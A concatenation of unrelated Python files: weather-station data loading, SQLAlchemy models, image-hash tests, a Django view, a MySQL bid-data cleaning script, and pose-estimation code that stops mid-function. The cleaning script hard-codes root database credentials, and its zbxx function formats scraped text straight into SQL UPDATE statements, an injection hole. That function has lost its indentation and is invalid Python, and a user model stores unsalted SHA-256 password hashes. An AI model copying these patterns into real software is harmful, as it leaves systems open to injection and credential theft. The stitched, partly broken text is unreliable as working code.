        d_IniDate = dt.datetime(f_YearIni, f_MonthIni, 1)
        i_LastDayinMonth = monthrange(f_YearFin, f_MonthFin)[1]
        d_FinDate = dt.datetime(f_YearFin, f_MonthFin, i_LastDayinMonth)
        idx_IniDate = bisect.bisect_right(d_AllDates, d_IniDate) - 1
        idx_FinDate = bisect.bisect_left(d_AllDates, d_FinDate) + 1
        # CREATING STRUCTURE
        idef = 0
        # for istn in range(nstations):
        # NOTE(review): hard-coded to the first 10 stations (debug leftover?).
        for istn in range(10):
            # Creating structure for each station
            t_StationData_Aux = dict()
            logging.info('Station : %s', c_AllStations[istn])
            t_StationData_Aux['c_StationName'] = c_AllStations[istn]
            t_StationData_Aux['c_Date'] = c_AllDates[idx_IniDate:idx_FinDate]
            t_StationData_Aux['f_Time'] = np.array(date2num(d_AllDates[idx_IniDate:idx_FinDate]))  # +0.5
            t_StationData_Aux['d_Time'] = d_AllDates[idx_IniDate:idx_FinDate]
            t_StationData_Aux['f_Lon'] = float(c_AllLon[istn])
            t_StationData_Aux['f_Lat'] = float(c_AllLat[istn])
            t_StationData_Aux['f_Elevation'] = float(c_AllHeights[istn])
            # FIX: np.float was removed from NumPy; builtin float is equivalent.
            f_Toto = np.array(f_Data[idx_IniDate:idx_FinDate, istn]).astype(float)
            f_Toto[f_Toto == -9999.0] = np.nan
            t_StationData_Aux[c_Variables] = f_Toto
            if idef == 0:
                # First station: take the dict as-is.
                t_StationData = t_StationData_Aux
                idef = 1
            else:
                # Later stations: each field becomes a list that we append to.
                for c_str in t_StationData.keys():
                    if (idef == 1):
                        Aux1 = [t_StationData[c_str]]
                    else:
                        Aux1 = t_StationData[c_str]
                    Aux1.append(t_StationData_Aux[c_str])
                    t_StationData[c_str] = Aux1
                idef = 2
        t_StationData['t_Units'] = dict()
        if c_Variables in t_VarsUnits:
            t_StationData['t_Units'][c_Variables] = t_VarsUnits[c_Variables]
        else:
            t_StationData['t_Units'][c_Variables] = None
        return t_StationData, c_TimeFrec
|
from sqlalchemy import Column, Integer, String, SmallInteger
from app.models.base import base
class Drift(base):
    """A book "drift" (gift-exchange) transaction record.

    Stores a point-in-time snapshot of the recipient, the book, the
    requester and the gifter, so later edits to profiles or book entries
    do not rewrite historical transactions.
    """
    # Recipient information.
    # NOTE: 'recipitent' is a historical misspelling kept as-is because the
    # column name is part of the existing schema.
    recipitent_name = Column(String(20), nullable=False)
    address = Column(String(120), nullable=False)
    message = Column(String(50))
    mobile = Column(String(11), nullable=False)
    # Book information.
    isbn = Column(String(25), nullable=False)
    book_title = Column(String(100), nullable=False)
    book_author = Column(String(15), nullable=False)
    book_img = Column(String(255), nullable=False)
    # Requester information.
    # BUG FIX: SQLAlchemy's Integer type takes no length argument;
    # Integer(50) raises TypeError at class-definition time.
    requester_id = Column(Integer, nullable=False)
    requester_nickname = Column(String(20), nullable=False)
    # Gifter information.
    gifter_id = Column(Integer, nullable=False)
    gift_id = Column(Integer, nullable=False)
    gifter_nickname = Column(String(20), nullable=False)
    # Transaction state flag; defaults to 1 (presumably "pending" — confirm
    # against the application's workflow constants).
    pending = Column('pending', SmallInteger, default=1)
|
#!/usr/bin/env python3
import grapher
import grapher_pb2 as pb
import hashlib
import unittest
class TestGrapherServicer(unittest.TestCase):
    """Golden-hash tests for grapher's rendering endpoints.

    Each test assembles a protobuf request, renders it through grapher and
    compares the SHA-256 digest of every produced image against a recorded
    golden hash.
    """

    def _assert_image_hashes(self, results, expected_hashes):
        # When changing grapher, regenerate the goldens by dumping each
        # image and recording its digest:
        #   with open("{}.png".format(results[i].title), "wb") as f:
        #       f.write(results[i].image)
        #   print(hashlib.sha256(results[i].image).hexdigest())
        for idx, result in enumerate(results):
            self.assertEqual(
                hashlib.sha256(result.image).hexdigest(),
                expected_hashes[idx],
            )

    def test_get_line_graph(self):
        metadatas = [
            pb.Metadata(
                title="IPv4 title",
                x_axis=12,
                y_axis=10,
                colour="#238341",
            ),
            pb.Metadata(
                title="IPv6 title",
                x_axis=12,
                y_axis=10,
                colour="#0041A0",
            ),
        ]
        totals_time = [
            pb.TotalTime(v4_values=10, v6_values=20, time=1560640600),
            pb.TotalTime(v4_values=30, v6_values=40, time=1560740799),
            pb.TotalTime(v4_values=25, v6_values=35, time=1560840998),
        ]
        request = pb.LineGraphRequest(
            metadatas=metadatas,
            totals_time=totals_time,
            copyright="some copyright",
        )
        self._assert_image_hashes(
            grapher.get_line_graph(request).images,
            [
                "b2c242eb9d89dc5499ff2bbd28743cf3f335ba6100300da4b3d4237e8c685f2f",
                "9a0a6c6c9a9c7b647bae8a687c4afe17c941e0bc18953e8ba8a85334fcf877f8",
            ],
        )

    def test_get_pie_chart(self):
        metadatas = [
            pb.Metadata(
                title="IPv4 title",
                x_axis=12,
                y_axis=10,
                colours=["lightgreen", "gold"],
                labels=["/8", "/24"],
            ),
            pb.Metadata(
                title="IPv6 title",
                x_axis=12,
                y_axis=10,
                colours=["lightgreen", "gold"],
                labels=["/8", "/24"],
            ),
        ]
        request = pb.PieChartRequest(
            metadatas=metadatas,
            subnets=pb.SubnetFamily(
                v4_values=(300, 600),
                v6_values=(30, 100),
            ),
            copyright="some copyright",
        )
        self._assert_image_hashes(
            grapher.get_pie_chart(request).images,
            [
                "eff79e5c555edfebce3be57e0cf70ebda366dadb8d435063f89ff5e5461aa636",
                "7d724137b605f36abe1d44ac088db2dccd182eb205896b3e9177d581e047ca0b",
            ],
        )

    def test_get_rpki(self):
        metadatas = [
            pb.Metadata(title="IPv4 title", x_axis=12, y_axis=10),
            pb.Metadata(title="IPv6 title", x_axis=12, y_axis=10),
        ]
        request = pb.RPKIRequest(
            metadatas=metadatas,
            rpkis=pb.RPKI(
                v4_valid=100,
                v4_invalid=100,
                v4_unknown=100,
                v6_valid=100,
                v6_invalid=100,
                v6_unknown=100,
            ),
            copyright="some copyright",
        )
        self._assert_image_hashes(
            grapher.get_rpki(request).images,
            [
                "e258018ac4eca9257405419ee9d8a85a707534857f47394b00fd092b8657be66",
                "d1a15e5116ec95af275b6cface9aceeb5db818916250295ea85e6c5c912e86ac",
            ],
        )
# Allow running this test module directly: python <this_file>.py
if __name__ == '__main__':
    unittest.main()
from sqlalchemy import Column, Integer, String, Boolean
from database import Base
from Crypto.Hash import SHA256
# Maximum column lengths for the users table.
NAME_MAX = 50
USER_MAX = 120
EMAIL_MAX = 120
# BUG FIX: passwords are stored as SHA256.hexdigest(), which is TWO hex
# characters per digest byte (64 chars total). The previous value
# (digest_size == 32) made the column half the required length, so
# databases that enforce VARCHAR lengths truncated every stored hash.
PASSWORD_MAX = SHA256.digest_size * 2
class User(Base):
    """Application user backed by the 'users' table.

    Passwords are stored as the hex-encoded SHA-256 digest of the raw
    password (64 hexadecimal characters).

    SECURITY NOTE(review): unsalted SHA-256 is not a suitable password
    hash (fast, rainbow-table friendly); consider bcrypt/scrypt/argon2.
    Left unchanged here because the stored format is part of the existing
    data contract.
    """
    __tablename__ = 'users'

    id = Column(Integer, primary_key=True)
    name = Column(String(NAME_MAX))
    user = Column(String(USER_MAX), unique=True)
    email = Column(String(EMAIL_MAX), unique=True)
    password = Column(String(PASSWORD_MAX))
    is_admin = Column(Boolean, unique=False, default=False)

    def __init__(self, name=None, email=None, username=None, password=None, is_admin=False):
        self.name = name
        self.user = username
        self.email = email
        # NOTE: raises AttributeError if password is None — callers must
        # always supply a password despite the keyword default.
        self.password = SHA256.new(data=password.encode('utf-8')).hexdigest()
        self.is_admin = is_admin

    def __repr__(self):
        # Prefix admins so they stand out in logs / shell output.
        prefix = '[admin] ' if self.is_admin else ''
        return prefix + '<User \"{}\" - {} ({}) : {}>'.format(
            self.name, self.user, self.email, self.password)
|
from django.urls import reverse_lazy
from django.contrib.messages import success
from django.shortcuts import redirect
from django.views.generic.edit import (
CreateView,
)
from .models import Contact
from .forms import ContactForm
from django.contrib.messages import success
from django.shortcuts import redirect
class ContactCreateView(CreateView):
    """Render the contact form and store submitted messages."""
    template_name = "contact.html"
    model = Contact
    form_class = ContactForm
    success_url = reverse_lazy('index:home')

    def form_valid(self, form):
        # Flash a confirmation message, then let CreateView save the
        # Contact instance and redirect to success_url.
        success(
            self.request,
            'Mesajınız qeydə alınmışdır tez bir zamanda sizinlə əlaqə saxlanılılacaq.'
        )
        return super().form_valid(form)
# -*- coding: utf-8 -*-
# ! /usr/bin/env python
"""
@author:LiWei
@license:LiWei
@contact:877129310@qq.com
@version:V1.0
@var:中标信息清洗
@note:中标信息清洗及入库等
"""
import re
import MySQLdb
from xbzxproject.utils import loadconfig
import datetime
import logging
# 中标公司信息清洗
def zbxx(database, tablename, days):
conn = MySQLdb.connect(host="192.168.10.24", port=3306, user="root", passwd="root", charset="utf8")
cur = conn.cursor()
now = datetime.datetime.now()
day = now - datetime.timedelta(days=days)
day = day.strftime(u"%Y-%m-%d 00:00:00")
cur.execute(u"SELECT content,url FROM {}.{} WHERE insert_time >='{}';".format(database, tablename, day))
contents = cur.fetchall()
for c in contents:
cc = c[0]
r = re.findall(u'(?<=中标单位:).*?公司', cc)
r1 = re.findall(u'(?<=中标候选人:).*?公司', cc)
j = re.findall(u'(?<=中标价格:).*?\d+[.|\d]+\d+', cc)
j1 = re.findall(u'(?<=中标金额:).*?元', cc)
j2 = re.findall(u'(?<=成交金额).*?元', cc)
j3 = re.findall(u'(?<=成交金额:).*?整', cc)
if len(r) > 0:
print r[0], c[1]
cur.execute(u"UPDATE {}.{} SET qyname='{}' WHERE url = '{}'".format(database, tablename, r[0], c[1]))
elif len(r1) > 0:
print r1[0], c[1]
cur.execute(u"UPDATE {}.{} SET qyname='{}' WHERE url = '{}'".format(database, tablename, r1[0], c[1]))
elif len(j) > 0:
print j[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j[0], c[1]))
elif len(j1) > 0:
print j1[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j1[0], c[1]))
elif len(j2) > 0:
print j2[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j2[0], c[1]))
elif len(j3) > 0:
print j3[0], c[1]
cur.execute(u"UPDATE {}.{} SET zbje='{}' WHERE url = '{}'".format(database, tablename, j3[0], c[1]))
conn.commit()
cur.close()
conn.close()
def qxdata(tablename1, tablename2, days):
    u"""Tag rows with their subject identification code (ztsbm).

    Copies the last *days* days of rows from the yqapp schema into the
    temp schema, tags rows matching each configured keyword with that
    keyword's ztsbm code (tablename1 by company name, tablename2 by
    article content), deletes rows that stay untagged and appends the
    result to the ``<table>_qx`` cleaned tables.

    :param tablename1: table cleaned by matching qyname
    :param tablename2: table cleaned by matching content
    :param days: how many days back to process (from today)
    """
    words = loadconfig.loadname()
    conn = MySQLdb.connect(host="192.168.10.24", port=3306, user="root", passwd="root", charset="utf8")
    cur = conn.cursor()
    cout = 1
    # Empty the temp staging tables.
    logging.warning(u"清空临时表:%s中..." % tablename1)
    cur.execute(u"TRUNCATE temp.{};".format(tablename1))
    logging.warning(u"清空临时表:%s中..." % tablename2)
    cur.execute(u"TRUNCATE temp.{};".format(tablename2))
    # Copy the rows that still need cleaning.
    now = datetime.datetime.now()
    day = (now - datetime.timedelta(days=days)).strftime(u"%Y-%m-%d 00:00:00")
    logging.warning(u"插入待清洗数据表:%s..." % tablename1)
    cur.execute(
        u"INSERT INTO temp.{} SELECT * FROM yqapp.{} WHERE insert_time >= %s ;".format(tablename1, tablename1),
        (day,))
    logging.warning(u"插入待清洗数据表:%s..." % tablename2)
    cur.execute(
        u"INSERT INTO temp.{} SELECT * FROM yqapp.{} WHERE insert_time >= %s ;".format(tablename2, tablename2),
        (day,))
    # Tag the subject identification code.
    for w in words:
        logging.warning(u"已执行第%s条" % cout)
        ztsbm = w[1]
        word = w[0]
        # SECURITY FIX: keyword and ztsbm values are bound as parameters
        # instead of being interpolated into the SQL text. Table names
        # still come from trusted internal callers only.
        like = u'%' + word + u'%'
        cur.execute(
            u"UPDATE temp.{} SET ztsbm=%s WHERE qyname LIKE %s".format(tablename1),
            (ztsbm, like))
        # Company news cleaning: tag by article content.
        cur.execute(
            u"UPDATE temp.{} SET ztsbm=%s,qyname=%s WHERE content LIKE %s".format(tablename2),
            (ztsbm, word, like))
        conn.commit()
        cout += 1
    logging.warning(u'删除没有主体识别码数据中...')
    cur.execute(u"DELETE FROM temp.{} WHERE ISNULL(ztsbm)".format(tablename1))
    cur.execute(u"DELETE FROM temp.{} WHERE ISNULL(ztsbm)".format(tablename2))
    conn.commit()
    logging.warning(u"将清洗完的完整数据插入到清洗表:{}_qx、{}_qx 中".format(tablename1,tablename2))
    cur.execute(
        u"INSERT INTO temp.{}_qx SELECT * FROM temp.{};".format(tablename1, tablename1))
    cur.execute(
        u"INSERT INTO temp.{}_qx SELECT * FROM temp.{};".format(tablename2, tablename2))
    conn.commit()
    cur.close()
    conn.close()
if __name__ == '__main__':
    # Entry point: clean the winning-bid table, then tag subject codes on
    # the last 21 days of data. (Last touched 2017-04-28.)
    logging.warning(u"中标公司信息清洗...")
    zbxx(database='yqapp', tablename='zbxx', days=21)
    qxdata(tablename1='zbxx', tablename2='news', days=21)
|
from datetime import datetime
import threading
def run_time_decorator(main_function):
    """Decorator that reports how long the wrapped function took to run.

    Prints one timestamped line with the current thread name, the wrapped
    function's name and its elapsed wall-clock seconds, then returns the
    wrapped function's result unchanged.
    """
    from functools import wraps  # local import keeps module-level deps unchanged

    @wraps(main_function)  # preserve __name__/__doc__ of the wrapped function
    def wrapper(*args, **kwargs):  # BUG FIX: keyword arguments were dropped
        start_time = datetime.now()
        response = main_function(*args, **kwargs)
        end_time = datetime.now()
        # Single-argument print(...) is valid on both Python 2 and 3.
        print("{} {}: '{}' function took {} secs to execute".format(
            str(datetime.now()).split('.')[0],
            threading.current_thread().name,
            main_function.__name__,
            str((end_time - start_time).total_seconds())))
        return response
    return wrapper
|
#!/usr/bin/env python3
import sys
sys.path.insert(0, '..')
import models.model as model
import gaModel.parallelGA as parallelGA
import numpy as np
# from mpi4py import MPI
def execParallelGA(year, region, qntYears=5, times=1):
    """
    Creates the GAModel with SC catalog with parallel and
    distributed island model.
    """
    # Collect one observation per calendar year and average their bins.
    observations = []
    bin_lists = []
    for offset in range(qntYears):
        obs = model.loadModelDB(region + 'jmaData', year + offset)
        obs.bins = obs.bins.tolist()
        observations.append(obs)
        bin_lists.append(obs.bins)
    mean_bins = np.mean(bin_lists, axis=0)

    target_year = year + qntYears
    for run_idx in range(times):
        model_ = model.model()
        model_ = parallelGA.gaModel(
            NGEN=100,
            CXPB=0.9,
            MUTPB=0.1,
            modelOmega=observations,
            year=target_year,
            region=region,
            mean=mean_bins,
            FREQ=10,
            tournsize=2,
            n_aval=50000)
        model_.executionNumber = run_idx
        model_.year = target_year
        model_.modelName = region + 'parallelGA'
        # Persisting the model is currently disabled:
        # parallelGA_ = model.loadModelDB(region + 'parallelGA', year)
        # if (parallelGA_.definitions==None):
        #     model.saveModelDB(model_)
def callParallelGA(region):
    """
    It is a wrapper to the function that generates the parallel GAModel
    It cover the years of 2000 to 2005, and the models are from 2005 to 2010
    """
    # NOTE(review): the loop is commented out, so only year 2000 is
    # actually processed despite the docstring; `year += 1` is a leftover
    # loop body. Re-enable the while to cover 2000-2005.
    year = 2000
    # while(year <= 2005):
    execParallelGA(year, region)
    year += 1
def main():
    """
    Create the environment needed to generate, in parallel and
    distributed fashion, the GAModel and List Model with the SC catalog
    for the regions EastJapan, Kanto, Kansai and Tohoku,
    from 2000 to 2005, producing models for 2005 to 2010.
    """
    # Only Kanto is currently enabled; the other regions stay disabled.
    callParallelGA('Kanto')
    # callParallelGA('EastJapan')
    # callParallelGA('Tohoku')
    # callParallelGA('Kansai')
# Run the experiment when executed as a script.
if __name__ == "__main__":
    main()
|
import autograd.numpy as np
import matplotlib.pyplot as plt
import cv2 as cv2
import utils
import os
import time
import sys
from util_classes import Store, Output, Model, Template
from pymanopt.manifolds import Stiefel
from pymanopt import Problem
from pymanopt.solvers import TrustRegions
from matplotlib.patches import Circle, Wedge, Polygon
from matplotlib.collections import PatchCollection
def readHM(filepath, M):
    '''
    Load the M per-keypoint heatmap images written next to *filepath*.

    Keypoint i lives in a file named ``<stem>_<i+1:02d><ext>``; only the
    first channel is kept and values are rescaled from [0, 255] to [0, 1].

    :param filepath: path of the base image file (extension included)
    :param M: number of keypoints
    :return: float array of shape [64, 64, M] with the raw heatmaps
    '''
    stem = filepath[0:len(filepath) - 4]
    ext = filepath[len(filepath) - 4:len(filepath)]
    heatmaps = np.zeros([64, 64, M])
    for idx in range(M):
        channel_file = stem + '_{:02d}'.format(idx + 1) + ext
        heatmaps[:, :, idx] = cv2.imread(channel_file)[:, :, 0]
    return heatmaps / 255.0
def cropImage(image,center,scale):
    '''
    crop the image and rezise it as an 200 by 200 image
    :param image : the image you want to resize
    :param center : the center of the image form which you want to resize the image
    :param scale : the cropping scale
    :return : the cropped and resized image
    '''
    # Crop window size: scale == 1.0 gives a 200x200 window before resizing.
    w = int(200*scale)
    h = int(w)
    # Top-left corner of the crop window in the original image.
    x = int(center[0] - w/2)
    y = int(center[1] - h/2)
    # Pad on every side so the crop window cannot fall outside the image.
    im = cv2.copyMakeBorder( image, w, w, h, h, cv2.BORDER_CONSTANT)
    # NOTE(review): this slice mixes the x/y corner offsets with the w/h
    # pads in a surprising way (rows indexed via x, columns via y); it only
    # yields a centred window when `center` is the image centre — verify
    # against the original MATLAB before relying on off-centre crops.
    im1 = im[w:x+2*w,h:y+2*h]
    im1 = cv2.resize(im1, (200, 200), interpolation=cv2.INTER_CUBIC)
    return im1
def findWMax(hm):
    '''
    Locate the peak of every keypoint heatmap.

    :param hm: heatmap stack of shape [H, W, p] as returned by readHM
    :return: [W_max, score] — W_max is a 2 x p array holding the 1-based
             (column, row) coordinates of each peak (1-based to match the
             MATLAB original), and score holds the peak values
    '''
    num_kpts = hm.shape[2]
    W_max = np.zeros([2, num_kpts])
    score = np.zeros(num_kpts)
    for idx in range(num_kpts):
        layer = hm[:, :, idx]
        score[idx] = layer.max()
        # argmax returns the first maximum in row-major order, matching the
        # original np.where(...)[0] selection.
        row, col = np.unravel_index(layer.argmax(), layer.shape)
        W_max[0, idx] = col + 1  # +1 keeps MATLAB's 1-based indexing
        W_max[1, idx] = row + 1
    return [W_max, score]
def prox_2norm(Z, lam):
    '''
    Proximal operator of the spectral norm: shrink the two singular values
    of Z by lam.

    :param Z: n x 2 matrix to shrink (n >= 2)
    :param lam: shrinkage amount
    :return: [X, normX] — the shrunk matrix and its largest singular value
    '''
    U, sv, V = np.linalg.svd(Z)  # Z = U * diag(sv) * V
    if np.sum(sv) <= lam:
        # Both singular values collapse to zero.
        sv = [0, 0]
    elif sv[0] - sv[1] <= lam:
        # Values are close together: shrink both to a common average.
        sv[0] = (np.sum(sv) - lam) / 2
        sv[1] = sv[0]
    else:
        # Values are far apart: only the largest one is shrunk.
        sv[0] = sv[0] - lam
    # Rebuild X = U * W * V with the modified singular values.
    W = np.zeros(Z.shape)
    n = len(Z[0])
    W[:n, :n] = np.diag(sv)
    X = np.dot(U, np.dot(W, V))
    return [X, sv[0]]
def proj_deformable_approx(X):
    '''
    Ref: A. Del Bue, J. Xavier, L. Agapito, and M. Paladini, "Bilinear
    Factorization via Augmented Lagrange Multipliers (BALM)" ECCV 2010.
    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; version 2, June 1991
    USAGE: Y = proj_deformable_approx(X)
    This function projects a generic matrix X of size 3*K x 2 where K is the
    number of basis shapes into the matrix Y that satisfy the manifold
    constraints. This projection is an approximation of the projector
    introduced in: M. Paladini, A. Del Bue, S. M. s, M. Dodig, J. Xavier, and
    L. Agapito, "Factorization for Non-Rigid and Articulated Structure using
    Metric Projections" CVPR 2009. Check the BALM paper, Sec 5.1.
    :param X : the 3*K x 2 affine matrix
    :return : [Y, L, Q] — the projected matrix, the per-basis coefficients
              and the common 3x2 orthonormal factor
    '''
    r = X.shape[0]
    d = int(r / 3)
    # Accumulate A = sum_i Ai*Ai' to find the common column space of the Ai.
    A = np.zeros((3,3))
    for i in range(d):
        Ai = X[3*i:3*(i+1),:]
        A = A + np.dot(Ai,np.transpose(Ai))
    # NOTE(review): the second positional arg of np.linalg.svd is
    # full_matrices; passing 4 just means "truthy" here.
    [U, S, V] = np.linalg.svd(A,4)
    Q = U[:,0:2]
    # First 2x2 invariant: trace / antisymmetric part of Ti = Q'*Ai.
    G = np.zeros((2,2))
    for i in range(d):
        Ai = X[3*i:3*(i+1),:]
        Ti = np.dot(np.transpose(Q),Ai)
        gi = np.array([ np.trace(Ti) , Ti[1,0] - Ti[0,1] ])
        G = G + np.outer(gi,np.transpose(gi)) # it is really import to use outer and not dot !!! test yourself
    [U1, S1, V1] = np.linalg.svd(G)
    # Second 2x2 invariant: symmetric traceless part of Ti.
    G = np.zeros((2,2))
    for i in range(d):
        Ai = X[3*i:3*(i+1),:]
        Ti = np.dot(np.transpose(Q),Ai)
        gi = np.array([ Ti[0,0]-Ti[1,1] , Ti[0,1]+Ti[1,0] ])
        G = G + np.outer(gi, np.transpose(gi))
    [U2, S2, V2] = np.linalg.svd(G,4)
    # Pick the in-plane rotation from whichever invariant dominates.
    if S1[0] > S2[0]:
        u = U1[:,0]
        R = [[u[0], -u[1]],[u[1], u[0]]]
    else:
        u = U2[:,0]
        R = [[u[0], u[1]], [u[1], -u[0]]]
    Q = np.dot(Q,R)
    # Back-project: each coefficient is ti = trace(Q'*Ai)/2.
    Y = np.zeros([d*Q.shape[0],Q.shape[1]])
    L = np.zeros(d)
    for i in range(d):
        Ai = X[3*i:3*(i+1),:]
        ti = 0.5*np.trace(np.dot(np.transpose(Q),Ai))
        L[i] = ti
        # NOTE(review): this column slice is only shape-consistent when
        # d == 1 (Y has Q.shape[1] == 2 columns, and ti*Q is 3x2); for
        # d > 1 the assignment would fail. Callers here only consume L and
        # Q — verify against the MATLAB original before using Y with K > 1.
        Y[:,2*i:2*(i+1)] = ti*Q
    return [Y, L, Q]
def syncRot(T):
    '''
    Recover a rotation from the motion matrix computed in PoseFromKpts_WP.

    :param T: 2 x 3K motion matrix
    :return: [R, C] — R is a 3x3 matrix whose first two rows come from the
             projected motion factor (third row completed by a cross
             product), and C carries the sign-corrected coefficients from
             proj_deformable_approx
    '''
    _, coeffs, Q = proj_deformable_approx(np.transpose(T))
    # Flip signs so that the dominant coefficient becomes positive.
    sign = np.sign(coeffs[np.argmax(np.abs(coeffs))])
    C = sign * np.transpose(coeffs)
    R = np.zeros((3, 3))
    R[0:2, 0:3] = sign * np.transpose(Q)
    R[2, 0:3] = np.cross(Q[0:3, 0], Q[0:3, 1])
    return [R, C]
def estimateR_weighted(S,W,D,R0):
    '''
    estimates the update of the rotation matrix for the second part of the iterations
    :param S : current 3D shape estimate (3 x p)
    :param W : 2D target keypoints (2 x p)
    :param D : diagonal weight matrix built from the heatmap scores
    :param R0 : previous rotation, used as the optimizer's starting point
    :return: R the new rotation matrix
    '''
    A = np.transpose(S)
    B = np.transpose(W)
    X0 = R0[0:2,:]
    [m,n] = A.shape
    p = B.shape[1]
    # NOTE(review): this zeros allocation is dead — At is immediately
    # overwritten by the transpose on the next line.
    At = np.zeros([n, m]);
    At = np.transpose(A)
    # we use the optimization on a Stiefel manifold because R is constrained to be othogonal
    manifold = Stiefel(n,p,1)
    # Store object caches E = A*X' - B between cost and grad evaluations.
    # NOTE(review): store.E is never invalidated when X changes, so grad
    # may reuse a stale residual — confirm against the solver's call order.
    store = Store()
    ####################################################################################################################
    def cost(X):
        '''
        cost function of the manifold, the cost is trace(E'*D*E)/2 with E = A*X' - B (cached in store.E)
        :param X : current point on the manifold
        :return : f, the scalar cost
        '''
        if store.E is None:
            store.E = np.dot(A,np.transpose(X))-B
        E = store.E
        f = np.trace(np.dot(np.transpose(E),np.dot(D,E)))/2
        return f
    def grad(X):
        '''
        Riemannian gradient of the cost at X: the Euclidean gradient
        projected onto the manifold's tangent space
        :param X : current point on the manifold
        :return : g, the Riemannian gradient
        '''
        if store.E is None:
            _ = cost(X)
        E = store.E
        # compute the euclidean gradient of the cost with the rotations R and the cloud A
        egrad = np.dot(At,np.dot(D,E))
        # transform this euclidean gradient into the Riemmanian gradient
        g = manifold.egrad2rgrad(np.transpose(X),egrad)
        store.egrad = egrad
        return np.array(g)
    ####################################################################################################################
    # setup the problem structure with manifold M and cost and grad function
    # NOTE(review): the hand-written grad above is NOT passed to Problem,
    # so pymanopt differentiates cost itself — confirm whether grad= was
    # meant to be supplied.
    problem = Problem(manifold=manifold, cost=cost, verbosity=0)
    # setup the trust region algorithm to solve the problem
    TR = TrustRegions(maxiter=10)
    # solve the problem, starting from the previous rotation X0
    X = TR.solve(problem,X0)
    return np.transpose(X) # return R = X'
def estimateC_weighted(W, R, B, D, lam):
    '''
    Weighted ridge estimate of the shape coefficients C.

    Solves the linear system y = X*C in the regularized least-squares
    sense, where y is the vectorized keypoint matrix and each column of X
    is a rotated basis shape: C = pinv(X'*D*X + lam*I) * X' * D * y.

    :param W : 2 x p keypoint matrix (from the heatmap peaks)
    :param R : 2 x 3 rotation matrix
    :param B : 3k x p stacked basis shapes
    :param D : p x p diagonal weight matrix
    :param lam : ridge regularization weight
    :return : the coefficient vector C (length k)
    '''
    p = len(W[0])
    k = int(B.shape[0] / 3)
    # Expand the p per-point weights into a 2p x 2p matrix (x and y rows).
    d = np.diag(D)
    D = np.zeros((2 * p, 2 * p))
    for i in range(p):
        D[2 * i, 2 * i] = d[i]
        D[2 * i + 1, 2 * i + 1] = d[i]
    # NOTE(review): W.flatten() is row-major ([all x, then all y]) while D
    # above is laid out as if coordinates were interleaved per point
    # ([x1,y1,x2,y2,...]). With non-uniform weights these orderings
    # disagree — the MATLAB original used column-major W(:); verify which
    # layout is intended.
    y = W.flatten()  # vectorized W
    X = np.zeros((2 * p, k))  # each column is a rotated Bk
    for i in range(k):
        RBi = np.dot(R, B[3 * i:3 * (i + 1), :])
        X[:, i] = RBi.flatten()
    # C = pinv(X'*D*X + lam*I) * X' * D * y
    # (removed: a dead `tol` computation whose value was never used)
    A = np.dot(np.dot(np.transpose(X), D), X) + lam * np.eye(X.shape[1])
    C = np.dot(np.dot(np.linalg.pinv(A), np.dot(np.transpose(X), D)), y)
    return np.transpose(C)
def PoseFromKpts_WP(W, dict, weight=None, verb=True, lam=1, tol=1e-10):
    '''
    Compute the pose under a weak-perspective camera model.

    Stage 1 runs an ADMM over the motion matrix; stage 2 alternately
    refines the rotation (Stiefel-manifold optimization) and the shape
    coefficients (weighted ridge regression).

    :param W: 2 x p maximal responses in the heatmap
    :param dict: the cad model template (provides mu and pc)
    :param weight: optional per-keypoint weights (defaults to identity)
    :param verb: print per-iteration diagnostics
    :param lam: regularization weight for the PC coefficients
    :param tol: convergence tolerance
    :return: an Output object with S, M, R, C, C0, T and fval
    '''
    # data size
    B = np.copy(dict.mu)  # B is the base (mean shape)
    pc = np.copy(dict.pc)
    [k, p] = B.shape
    k = int(k / 3)
    # setting values
    if weight is None:
        D = np.eye(p)
    else:
        D = np.diag(weight)
    alpha = 1
    # centralize basis
    mean = np.mean(B, 1)
    for i in range(3 * k):
        B[i] -= mean[i]
    # initialization
    M = np.zeros([2, 3 * k])
    C = np.zeros(k)  # norm of each Xi
    # auxiliary variables for ADMM
    Z = np.copy(M)
    Y = np.copy(M)
    eps = sys.float_info.epsilon
    mu = 1 / (np.mean(W) + eps)
    # pre-computing
    BBt = np.dot(B, np.dot(D, np.transpose(B)))
    # ADMM iteration: alternate T, Z, M updates with dual ascent on Y
    for iter in range(1000):
        # update translation: T = sum((W-Z*B)*D, 1) / (sum(D)+eps)
        T = np.sum(np.dot((W - np.matmul(Z, B)), D), 1) / (np.sum(D) + eps)
        W2fit = np.copy(W)
        W2fit[0] -= T[0]
        W2fit[1] -= T[1]
        # update motion matrix Z = (W2fit*D*B'+mu*M+Y)/(BBt+mu*eye(3*k))
        Z0 = np.copy(Z)
        Z = np.dot(np.dot(W2fit, np.dot(D, np.transpose(B))) + mu * M + Y,
                   np.linalg.inv(BBt + mu * np.eye(3 * k)))
        # update motion matrix M via the spectral-norm proximal operator
        Q = Z - Y / mu
        for i in range(k):
            [X, normX] = prox_2norm(np.transpose(Q[:, 3 * i:3 * i + 3]), alpha / mu)
            M[:, 3 * i:3 * i + 3] = np.transpose(X)
            C[i] = normX
        # update dual variable
        Y = Y + mu * (M - Z)
        PrimRes = np.linalg.norm(M - Z) / (np.linalg.norm(Z0) + eps)
        DualRes = mu * np.linalg.norm(Z - Z0) / (np.linalg.norm(Z0) + eps)
        # show output
        if verb:
            print('Iter = ', iter, ' ; PrimRes = ', PrimRes, '; DualRes = ', DualRes,
                  ' ; mu = ', '{:08.6f}'.format(mu), '\n')
        # check convergence
        if PrimRes < tol and DualRes < tol:
            break
        else:
            # adapt the ADMM penalty to balance primal and dual residuals
            if PrimRes > 10 * DualRes:
                mu = 2 * mu
            elif DualRes > 10 * PrimRes:
                mu = mu / 2
            else:
                pass
    # end iteration
    [R, C] = syncRot(M)
    if np.sum(np.abs(R)) == 0:
        R = np.eye(3)
    R = R[0:2, :]
    S = np.dot(np.kron(C, np.eye(3)), B)
    # iteration, part 2: alternately refine rotation and shape coefficients
    fval = np.inf
    for iter in range(1000):
        # update translation: T = sum((W-R*S)*D, 1) / (sum(D)+eps)
        T = np.sum(np.dot((W - np.dot(R, S)), D), 1) / (np.sum(D) + eps)
        W2fit = np.copy(W)
        W2fit[0] -= T[0]
        W2fit[1] -= T[1]
        # update rotation
        R = np.transpose(estimateR_weighted(S, W2fit, D, R))
